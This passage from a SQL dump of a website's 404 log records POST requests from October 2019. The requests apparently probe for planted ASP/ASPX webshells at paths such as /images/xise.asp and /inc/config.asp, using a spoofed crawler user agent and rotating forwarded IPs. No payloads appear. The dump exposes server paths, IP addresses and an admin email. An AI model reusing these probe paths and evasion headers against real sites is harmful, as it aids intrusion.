Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"210.37.166.157\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"210.37.166.157\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/feedback/testp.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/feedback/testp.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa4sUiEiZGLZYlop40cE6QAAARc\";s:12:\"REDIRECT_URL\";s:19:\"/feedback/testp.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"53553\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/feedback/testp.asp\";s:10:\"SCRIPT_URL\";s:19:\"/feedback/testp.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa4sUiEiZGLZYlop40cE6QAAARc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571695698.8973\";s:12:\"REQUEST_TIME\";s:10:\"1571695698\";}}','notice','2019-10-21 22:08:20','2019-10-21 22:08:19',35265832,37074368,'http://bintara.com.my//feedback/testp.asp',1,0,'210.37.166.157'),(28646,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//images/xise.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"819\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"202.76.240.187\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"202.76.240.187\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/images/xise.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/images/xise.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa4sWCEiZGLZYlop40cE7AAAAQM\";s:12:\"REDIRECT_URL\";s:16:\"/images/xise.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"53553\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/images/xise.asp\";s:10:\"SCRIPT_URL\";s:16:\"/images/xise.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa4sWCEiZGLZYlop40cE7AAAAQM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571695704.322\";s:12:\"REQUEST_TIME\";s:10:\"1571695704\";}}','notice','2019-10-21 22:08:26','2019-10-21 22:08:24',35339648,37127112,'http://bintara.com.my//images/xise.asp',1,0,'202.76.240.187'),(28647,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//images/xise.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"684\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"122.14.195.127\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"122.14.195.127\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/images/xise.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/images/xise.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa4sWiEiZGLZYlop40cE7QAAARU\";s:12:\"REDIRECT_URL\";s:16:\"/images/xise.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"53553\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/images/xise.asp\";s:10:\"SCRIPT_URL\";s:16:\"/images/xise.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa4sWiEiZGLZYlop40cE7QAAARU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571695706.9483\";s:12:\"REQUEST_TIME\";s:10:\"1571695706\";}}','notice','2019-10-21 22:08:28','2019-10-21 22:08:27',35267920,37083368,'http://bintara.com.my//images/xise.asp',1,0,'122.14.195.127'),(28648,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//Files/x(2).aspx\";s:14:\"CONTENT_LENGTH\";s:3:\"819\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"220.200.167.41\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"220.200.167.41\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/Files/x(2).aspx\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/Files/x(2).aspx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa4siOAgYuZ1@aLzbZgP8wAAAIQ\";s:12:\"REDIRECT_URL\";s:16:\"/Files/x(2).aspx\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"55353\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/Files/x(2).aspx\";s:10:\"SCRIPT_URL\";s:16:\"/Files/x(2).aspx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa4siOAgYuZ1@aLzbZgP8wAAAIQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571695752.8936\";s:12:\"REQUEST_TIME\";s:10:\"1571695752\";}}','notice','2019-10-21 22:09:14','2019-10-21 22:09:13',35340208,37134176,'http://bintara.com.my//Files/x(2).aspx',1,0,'220.200.167.41'),(28649,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//Files/x(2).aspx\";s:14:\"CONTENT_LENGTH\";s:3:\"684\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"61.243.222.77\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"61.243.222.77\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/Files/x(2).aspx\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/Files/x(2).aspx\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa4sjuAgYuZ1@aLzbZgP9QAAAJI\";s:12:\"REDIRECT_URL\";s:16:\"/Files/x(2).aspx\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"55353\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/Files/x(2).aspx\";s:10:\"SCRIPT_URL\";s:16:\"/Files/x(2).aspx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa4sjuAgYuZ1@aLzbZgP9QAAAJI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571695758.9873\";s:12:\"REQUEST_TIME\";s:10:\"1571695758\";}}','notice','2019-10-21 22:09:20','2019-10-21 22:09:19',35269232,37068288,'http://bintara.com.my//Files/x(2).aspx',1,0,'61.243.222.77'),(28650,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"//inc/config.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"820\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:11:\"58.19.98.30\";s:20:\"HTTP_X_FORWARDED_FOR\";s:11:\"58.19.98.30\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/inc/config.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/inc/config.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa4sneAgYuZ1@aLzbZgP@gAAAIA\";s:12:\"REDIRECT_URL\";s:15:\"/inc/config.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"55353\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/inc/config.asp\";s:10:\"SCRIPT_URL\";s:15:\"/inc/config.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa4sneAgYuZ1@aLzbZgP@gAAAIA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571695773.8832\";s:12:\"REQUEST_TIME\";s:10:\"1571695773\";}}','notice','2019-10-21 22:09:35','2019-10-21 22:09:34',35337792,37132736,'http://bintara.com.my//inc/config.asp',1,0,'58.19.98.30'),(28651,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"//inc/config.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"685\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"159.226.181.0\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"159.226.181.0\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"http://bintara.com.my/inc/config.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/inc/config.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa4so@AgYuZ1@aLzbZgP-AAAAIg\";s:12:\"REDIRECT_URL\";s:15:\"/inc/config.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"55353\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:36:\"http://bintara.com.my/inc/config.asp\";s:10:\"SCRIPT_URL\";s:15:\"/inc/config.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa4so@AgYuZ1@aLzbZgP-AAAAIg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571695780.0337\";s:12:\"REQUEST_TIME\";s:10:\"1571695780\";}}','notice','2019-10-21 22:09:41','2019-10-21 22:09:40',35269880,37074432,'http://bintara.com.my//inc/config.asp',1,0,'159.226.181.0'),(28652,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"//inc/index.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"821\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"124.133.78.27\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"124.133.78.27\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"http://bintara.com.my/inc/index.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/inc/index.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa4sqOAgYuZ1@aLzbZgP-QAAAIw\";s:12:\"REDIRECT_URL\";s:14:\"/inc/index.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"55353\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"http://bintara.com.my/inc/index.asp\";s:10:\"SCRIPT_URL\";s:14:\"/inc/index.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa4sqOAgYuZ1@aLzbZgP-QAAAIw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571695784.8497\";s:12:\"REQUEST_TIME\";s:10:\"1571695784\";}}','notice','2019-10-21 22:09:46','2019-10-21 22:09:45',35340728,37145184,'http://bintara.com.my//inc/index.asp',1,0,'124.133.78.27'),(28653,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"//inc/index.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"686\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"202.127.12.134\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"202.127.12.134\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"http://bintara.com.my/inc/index.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/inc/index.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa4sruAgYuZ1@aLzbZgP-gAAAIU\";s:12:\"REDIRECT_URL\";s:14:\"/inc/index.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"55353\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"http://bintara.com.my/inc/index.asp\";s:10:\"SCRIPT_URL\";s:14:\"/inc/index.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa4sruAgYuZ1@aLzbZgP-gAAAIU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571695790.3503\";s:12:\"REQUEST_TIME\";s:10:\"1571695790\";}}','notice','2019-10-21 22:09:52','2019-10-21 22:09:50',35268360,37075136,'http://bintara.com.my//inc/index.asp',1,0,'202.127.12.134'),(28654,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//admin/login.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"819\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; 